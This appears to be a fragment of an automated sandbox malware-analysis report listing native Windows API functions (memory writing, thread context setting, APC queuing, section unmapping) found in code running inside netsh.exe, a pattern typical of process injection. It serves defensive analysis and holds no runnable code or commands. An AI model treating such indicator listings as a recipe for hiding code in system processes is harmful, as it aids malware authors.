          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038099D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038098A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038098F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0380B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038097A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0380A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0380A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038095F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0380AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809560 NtWriteFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DD8690 NtReadFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DD8710 NtClose,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DD85E0 NtCreateFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DD870C NtReadFile,NtClose,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DD85DA NtCreateFile,